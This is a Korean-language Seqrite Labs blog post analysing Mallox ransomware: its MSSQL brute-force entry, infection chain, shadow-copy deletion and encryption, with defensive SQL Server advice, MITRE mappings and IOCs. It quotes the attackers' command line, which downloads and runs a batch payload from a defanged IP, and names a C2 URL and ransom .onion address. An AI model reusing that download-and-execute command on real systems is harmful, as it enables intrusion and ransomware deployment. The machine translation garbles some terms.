• 제품 & 서비스
        • 클라우드

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • 온프레미스

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • 플랫폼

          • Malware Analysis Platform
        • 소기업

          • SOHO Total Edition
        • 서비스

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • 사이버 보안 및 Data Privacy Awareness
  • 솔루션
    • BFSI
    • 교육
    • 정부·공공
    • 의료
    • ITeS
    • 제조
  • 회사
    • 회사 소개 Seqrite
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 리소스
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 이해 Data Privacy
    • 위험 점수를 확인하세요
    • DPDP 대화
    • 개인 정보 보호 시간
Seqrite 실험실 블로그
영업팀에 문의 공격받고 있습니까?
  • 제품 & 서비스
        • 클라우드

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • 온프레미스

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • 플랫폼

          • Malware Analysis Platform
        • 소기업

          • SOHO Total Edition
        • 서비스

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • 사이버 보안 및 Data Privacy Awareness
  • 솔루션
    • BFSI
    • 교육
    • 정부·공공
    • 의료
    • ITeS
    • 제조
  • 회사
    • 회사 소개 Seqrite
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 리소스
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 이해 Data Privacy
    • 위험 점수를 확인하세요
    • DPDP 대화
    • 개인 정보 보호 시간
홈  /  랜섬  / Mallox 랜섬웨어 탐색: 전략, 기술 및 방어
Mallox 랜섬웨어 탐색: 전략, 기술 및 방어
25 XNUMX 월 2023

Mallox 랜섬웨어 탐색: 전략, 기술 및 방어

Written by 소우멘 버마
소우멘 버마
랜섬

소개 :

2021년 중반에 처음 발견된 말록스 랜섬웨어는 사이버 범죄 환경에서 강력한 위협으로 떠올랐습니다. 로컬 및 네트워크 공유 드라이브를 포함한 모든 볼륨을 암호화할 수 있는 능력을 통해, 말록스는 점차 시스템 통제권을 확대하여 피해자들을 디지털 절망에 빠뜨립니다.

Mallox 랜섬웨어는 암호화된 파일에 “.mallox” 확장자를 사용하며, 공격자와 사용자 간의 추가 통신을 위한 고유한 “Tor” 링크가 포함된 “File Recovery.txt”라는 이름의 ‘랜섬 노트’를 생성합니다.

이 블로그에서는 Mallox 랜섬웨어에 대한 우리의 연구 내용을 자세히 소개하고, 이 랜섬웨어가 얼마나 은밀하게 작동하는지 이해하는 데 도움을 드리고, 보호를 받는 방법에 대한 최신 정보를 알려드리겠습니다. 

공격 벡터:

저희 조사에 따르면 Mallox(일명 TargetCompany) 랜섬웨어는 현재 보안되지 않은 Microsoft SQL 서버를 공격 벡터로 삼아 피해자의 시스템에 침투하고 랜섬웨어를 배포하고 있는 것으로 나타났습니다.

또한, 공개적으로 노출된 MSSQL 서버 에서 피해자 네트워크에 대한 초기 접근 권한을 획득하려는 시도가 여러 차례 실패하거나 오류를 범한 것을 확인했습니다 . 이러한 패턴은 MSSQL 무차별 대입 공격을 시사하며, 해당 서버들이 피해자 시스템에 대한 주요 진입점으로서 핵심적인 역할을 한다는 점을 강조합니다.

무차별 대입 공격을 통해 보안되지 않은 MSSQL 인스턴스에 대한 초기 접근 권한을 얻은 후, MSSQL 서비스 'sqlservr.exe' 명령줄을 사용하여 악성 파일과 페이로드를 피해자의 컴퓨터에 침투시키는 것으로 관찰되었습니다.

“C:\WINDOWS\\System32\\cmd.exe” /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(“http[:]//43[.]138[.]76[.]102/Mfhigwwvsie[.]bat”, “%TEMP%\tzt.bat”) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy %TEMP%\updt.ps1 우회 & WMIC 프로세스 호출 “%TEMP%\tzt.bat” 생성

감염 사슬:

tzt.bat을 실행하는 동안 Aspnet_Complier.exe에 랜섬 코드를 삽입한 다음 killer.bat 파일을 삭제하고 실행합니다. 이 파일은 원치 않는 모든 서비스를 삭제하고 모든 작업을 중단시켜 암호화 프로세스가 성공적으로 진행되도록 합니다.

그림: 감염 사슬

탑재량에 대한 기술적 분석:

Bat 파일은 랜섬웨어 코드를 주입하는 .NET 페이로드 "Mfhigwwvise.exe"를 실행합니다.

.NET 페이로드를 분석하는 동안 "hxxps://files.catbox.moe/r6piiq.vdf"에서 AES 암호로 암호화된 또 다른 암호화된 VDF 페이로드를 다운로드한다는 사실이 발견되었습니다. 아래 그림과 같습니다.

이는 메모리에 직접 복호화됩니다.

그림: C2에서 VDF 다운로드

그림: 복호화된 VDF 페이로드

복호화된 DLL 파일은 IntelliLock 난독화 도구를 사용하여 추가로 난독화됩니다. 로더는 이제 프로세스 할로잉 기법을 사용하여 복호화된 랜섬웨어 DLL을 다른 프로세스에 로드합니다.

스레드 풀을 생성한 후 로더는 InvokeMember() 함수를 사용하여 랜섬웨어 코드를 Aspnet_Compler.exe에 주입하고 실행합니다.

그림: DLL 함수 호출

삽입된 랜섬 코드의 기술적 분석:

Mallox 랜섬웨어의 주입된 페이로드는 국가 확인, 섀도 복사본 삭제, 실행 중인 프로세스 종료 및 암호화를 포함하는 주요 모듈입니다.

첫째, 현재 사용자의 기본 언어 ID를 확인하여 일부 국가를 공격 대상에서 제외합니다.

그림: 언어 ID 확인

그런 다음 스레드를 생성합니다. 첫 번째 스레드는 레지스트리 키를 삭제하고, 그 다음에는 아래와 같이 섀도 복사본을 삭제합니다.

그림: 레지스트리 키 삭제

그림: 섀도 복사본 삭제

두 번째 스레드는 부팅 구성을 수정하고 일부 하드코딩된 프로세스를 종료합니다.

그림: 부팅 구성을 위한 BCD cmd 사용

그림: 프로세스 종료

그 후, 세 번째 스레드는 SQL 관련 서비스에서 사용된 명령줄을 제거합니다. 아래 그림과 같습니다.

그림: SQL 관련 서비스 제거

PC를 종료하거나 재부팅하려고 하면 ' PC를 종료하거나 재부팅하지 마십시오. 파일이 영구적으로 손상될 수 있습니다!' 라는 경고 메시지가 사용자에게 표시됩니다.

Windows 레지스트리를 수정하여 사용자가 시스템을 종료하거나 다시 시작할 수 없도록 합니다. 특정 레지스트리 값을 설정하면 종료, 다시 시작 및 로그아웃 옵션이 비활성화되어 사용자가 이러한 작업을 수행할 수 없게 됩니다.

그림: 시스템 옵션 비활성화

침투 시스템 정보

말록스 랜섬웨어는 암호화 전에 대상 시스템의 데이터를 유출할 수 있습니다. 다른 수많은 현대 랜섬웨어 조직의 일반적인 접근 방식과 마찬가지로, 말록스는 몸값 지불을 거부하는 피해자의 데이터를 노출하는 웹사이트를 운영합니다. 시스템 정보를 수집하여 C2C로 전송합니다.

그림: 데이터 유출 대상 시스템

그림: C2 서버 연결

암호화:

암호화 스레드는 기존 프로세서의 수를 기반으로 생성되며 최대 스레드 수는 64개입니다.

그림: 프로세서 수에 따른 암호화 스레드

폴더 및 파일 제외:

이 함수는 FindFirstFileExW API를 사용하여 모든 디렉터리를 탐색합니다 . 파일, 폴더 및 특정 확장자는 제외합니다.

또한 랜섬웨어 메모인 "File Recovery.txt"도 암호화 과정에서 제외됩니다.

그림: 허용 목록에 있는 폴더와 비교

그림: 안전 목록에 있는 확장자와 비교

그림: 허용 목록에 있는 파일과 비교

그림: 허용 목록에 있는 파일과 비교

" File Recovery.txt " 라는 이름의 랜섬웨어 메시지가 모든 폴더에 생성됩니다. 이 메시지에는 아래와 같이 공격자와 연락하여 암호 해독을 요청할 수 있는 Onion 링크가 포함되어 있습니다.

TOR 브라우저를 실행하고 사이트를 엽니다.

Wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion[/]mallox[/]privateSignin

그림: 랜섬 노트 작성

sala20 암호화 알고리즘을 사용하여 샘플을 암호화합니다.

암호화 후에는 파일 확장자로 ".Mallox"가 추가됩니다.

이런 종류의 공격을 예방하기 위한 팁:

Mallox 랜섬웨어 공격을 방지하려면 Microsoft SQL Server 인스턴스 보안이 매우 중요합니다. SQL Server 환경의 보안을 강화하려면 다음 권장 단계를 따르세요.

  1. 방화벽 보호/액세스 제한: 방화벽을 사용하여 SQL 서버 접근을 제한하세요. 신뢰할 수 있는 네트워크 및 IP에서 들어오는 트래픽만 허용하세요. 특히, 권한이 있는 사용자를 제외하고 1433번 포트에서 들어오는 트래픽을 차단하세요.
  2. 기본 포트 변경: 해커의 주요 공격 대상이므로 인터넷을 통해 기본 포트(1433)에서 SQL 서버를 노출하지 마십시오. 원격으로 SQL 서버에 접속할 때는 VPN과 같은 보안 연결을 사용하는 것이 좋습니다.
  3. 안전한 계정 관리: 'sa'(시스템 관리자) 계정을 비활성화하거나 강력하고 고유한 비밀번호를 설정하여 무단 접근 위험을 최소화하세요. sa 계정은 높은 권한을 가지고 있습니다.
  4. 강력한 암호: 모든 SQL 로그인에 강력하고 고유한 비밀번호를 적용하세요. 대문자, 소문자, 숫자, 특수 문자를 조합하여 비밀번호 보안을 강화하세요.
  5. 계정 잠금 정책: 여러 번 실패하면 SQL Server 로그인을 일시적으로 차단하는 계정 잠금 정책을 구현하세요. 이렇게 하면 무차별 대입 공격을 방지할 수 있습니다.
  6. SQL CLR 어셈블리 감사: 필수적이지 않은 SQL CLR 어셈블리를 검토하고 비활성화하십시오. 잠재적인 취약점을 완화하기 위해 중복된 어셈블리를 정기적으로 평가하고 제거하십시오.
  7. 전송 중 데이터 암호화: 클라이언트와 SQL 서버 간 전송 시 SSL/TLS 프로토콜을 사용하여 데이터를 암호화하세요. 이를 통해 잠재적인 도청 및 데이터 가로채기를 방지할 수 있습니다.
  8. SQL Server 활동을 주시하세요: SQL Server 감사 기능을 활용하여 SQL Server 인스턴스 내의 모든 작업을 꼼꼼하게 추적하고 기록하세요. 이러한 활동을 적극적으로 모니터링함으로써 잠재적인 보안 위험을 신속하게 감지하고 해결할 수 있습니다.
  9. 최신 정보 유지: SQL Server 인스턴스, 운영 체제 및 기타 설치된 애플리케이션에 최신 업데이트와 패치를 정기적으로 적용하세요. 이렇게 하면 알려진 취약점을 완화하고 지속적인 보안을 유지하는 데 도움이 됩니다.

네트워크 내 공유 데이터 손상을 최소화하기 위한 예방 조치:

  • 공유 폴더에 대한 액세스 제한: 네트워크 분리를 통해 공유 폴더에 대한 접근 권한을 필요한 사람으로만 제한하세요. 강력한 접근 제어를 적용하여 권한이 있는 사용자만 네트워크의 공유 데이터를 변경할 수 있도록 하세요.
  • 정기적인 데이터 백업: 공유 데이터를 안전하고 격리된 장소에 지속적으로 백업하십시오. 데이터 무결성을 검증하고 공격 발생 시 신속한 데이터 복구 프로세스를 보장하기 위해 백업을 정기적으로 테스트하십시오.
  • 예약된 오프라인 백업: 라이브/온라인 백업을 암호화하려는 랜섬웨어 공격으로부터 보호하기 위해 중요한 공유 데이터의 오프라인 백업을 유지하세요.

이러한 예방 조치를 준수함으로써 Microsoft SQL Server 인스턴스를 표적으로 삼는 Mallox 랜섬웨어 공격의 위험을 크게 줄이고 환경의 전반적인 보안 태세를 강화할 수 있습니다.

어떻게합니까 SEQRITE Mallox 랜섬웨어로부터 고객을 보호하시겠습니까?

SEQRITE해당 안티바이러스 프로그램은 공격에 사용된 다양한 스크립트 파일과 랜섬웨어 페이로드에 대한 시그니처를 보유하고 있습니다. 이 랜섬웨어에 대한 시그니처는 다음과 같습니다.

  • 랜섬.말록스.S28994722
  • PS.다운로더.박스터.47436
  • BAT.에이전트.CQ
  • 스크립트.트로이-다운로더.A8341828
  • 스크립트.트로이.A8269601

더 자세히 알아보려면 SEQRITE당사의 다양한 디지털 보호 솔루션을 보시려면 다음 링크를 방문하십시오.

https://www.seqrite.com/

결론 :

사이버 위협이 점점 더 정교해짐에 따라, Mallox 랜섬웨어는 은밀하고 끊임없이 진화하는 적으로 등장했습니다.

보안이 취약한 MSSQL 서버를 시작점으로 삼는 것이 그들의 전략입니다. 일단 침투하면, 암호화라는 장막 아래 악성 파일들을 조합하여 시스템 프로세스에 혼란을 야기하는 복잡한 감염 사슬을 펼칩니다.

복잡한 악의의 실마리를 가진 말록스 랜섬웨어는 취약점을 노려 디지털 세상을 위험한 전쟁터로 만들어버립니다. 전형적인 디지털 인질극으로, 당신의 요구는 명확합니다. 소중한 데이터나 자유를 위한 대가로 돈을 요구하는 것이죠!

SEQRITE'의 시그니처 기반 보호 기능은 이 랜섬웨어 변종에 대한 방어 기능을 제공합니다.

MITRE ATT&CK TTP:

명령 및 스크립팅 해석기 T1059
시스템 복구 억제 T1490
파일 및 디렉토리 검색 T1083
시스템 정보 검색 T1082
영향력을 위해 암호화된 데이터 T1486
서비스 중지 T1489

 IOC:

배트 로더:

77BFCEE98F086C8E25A69D252A6609E1

08D4D184E6E3484E8B676FA0E0A24AFA

페이로드 :

1B7578D04324CD6C8BF11985B79A814A

저자 :

소우멘 버마

바이바브 빌라데

우마르 칸

 이전 포스트2023년 디지털 개인정보 보호법 해석하기, 7가지 핵심 주제
다음 포스트  위협 권고: WinRAR에서 제로데이 취약점이 감지되었습니다.
소우멘 버마

Soumen Burma 소개

소우멘은 Quick Heal Technologies의 수석 보안 연구원입니다. 그는 리버스 엔지니어링, 악성코드 분석 등에 관심이 있습니다.

Soumen Burma의 기사 »

관련 게시물

  • 랜섬웨어 공격 피해 최소화를 위한 최적의 사고 대응 기법

    2026년 6월 2일
  • 랜섬웨어 공격에서 몸값을 지불하지 않고 복구하는 방법

    2026 년 5 월 25 일
  • 공개적으로 공유되는 SMB2 연결을 통한 랜섬웨어 공격 및 보호 방법 Seqrite

    2025 년 3 월 11 일
추천 작가
  • Seqrite
    Seqrite

    Seqrite 당사는 기업용 사이버 보안 솔루션 분야의 선도적인 제공업체입니다. 주요 사업 분야는 다음과 같습니다...

    기사 더 읽기 Seqrite
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    Bineesh P의 다른 글들을 읽어보세요
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    Jyoti Karlekar의 기사 더 읽기
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    산제이 카트카르의 다른 기사들을 읽어보세요
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (342) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (51) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) data privacy (17) 데이터 보호 (35) 데이터 보안 (19) DLP (50) DPDP (14) 디피디파 (17) 암호화 (16) 엔드 포인트 보안 (113) 엔터프라이즈 보안 (20) 공적 (13) GDPR (14) 악성 코드 (76) 악성 코드 분석 (14) 악성 코드 공격 (23) MDM (27) Microsoft (15) MITER ATT & CK (14) 네트워크 보안 (26) 피싱 (30) 랜섬 (69) 중매 공격 (31) ransomware 공격 (31) 중매 보호 (17) Seqrite (41) Seqrite 암호화 (27) Seqrite EPS (33) Seqrite 서비스 (16) 위협 탐지 (14) 그래프 기반 사이버 위협 인텔리전스 (23) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
Seqrite 실험실

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 알아보기 Seqrite

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • 온프레미스
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • 플랫폼
  • Malware Analysis Platform
  • 마이크로 비즈니스
  • SOHO Total Edition
  • 서비스
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • 사이버 보안 및 Data Privacy Awareness
리소스
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 이해 Data Privacy
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
  • 개인 정보 보호 시간
문의하기
  • 등록 사무소
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
회사 소개
  • 회사 소개 Seqrite
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관